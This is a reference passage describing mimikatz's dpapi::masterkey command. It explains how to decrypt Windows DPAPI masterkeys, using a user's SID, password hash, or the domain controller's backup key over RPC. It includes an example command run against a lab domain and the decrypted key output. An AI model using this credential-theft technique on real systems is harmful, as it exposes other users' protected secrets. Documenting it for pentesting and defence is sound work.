dpapi::masterkey describes a Masterkey file and unprotects each Masterkey (key depending). In other words, it can decrypt and request masterkeys from active directory (cf. ). It has the following command line arguments:
/in: The path of the masterkey. The masterkeys are stored at C:\Users\<UserName>\AppData\Roaming\Microsoft\Protect\<SID>\<MasterKey>
/dc: the target domain controller
/rpc: it can be used to remotely decrypt the masterkey of the target user by contacting the domain controller. According to Benjamin, in a domain, a domain controller runs an RPC Service to deal with encrypted masterkeys for users, (Backupkey Remote Protocol).
/sid: the target user's Security Identifier
/pvk: the path to the private key file. It can be obtained through .
/hash: the SHA1 hash of the target user's password. It can be found through .
/system: The DPAPI_SYSTEM key. It can be found through .
/domain: the target active directory domain
/password: the target user's password
/protected: it defines the user account as a protected one
The dpapi::cred can also display the masterkey location through the guidMasterKey value.
The following examples were taken from Benjamin's guide.
mimikatz # dpapi::masterkey /in:"%appdata%\Microsoft\Protect\S-1-5-21-1719172562-3308538836-3929312420-1104\cc6eb538-28f1-4ab4-adf2-f5594e88f0b2" /rpc
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {cc6eb538-28f1-4ab4-adf2-f5594e88f0b2}
[...]
[domainkey] with RPC
[DC] 'lab.local' will be the domain
[DC] 'dc.lab.local' will be the DC server
key : 3ed054e284b5d47796f4779a2c0de63ca0ea9c63ce9e3f6868e2dd4f1113f6f3c55d9c1e21d2378c4499f98c0682991647dfd5f60b4f05034163ff59651e4ad4
sha1: 81c99543dea591c11f20d69027ea2016d89d07dd
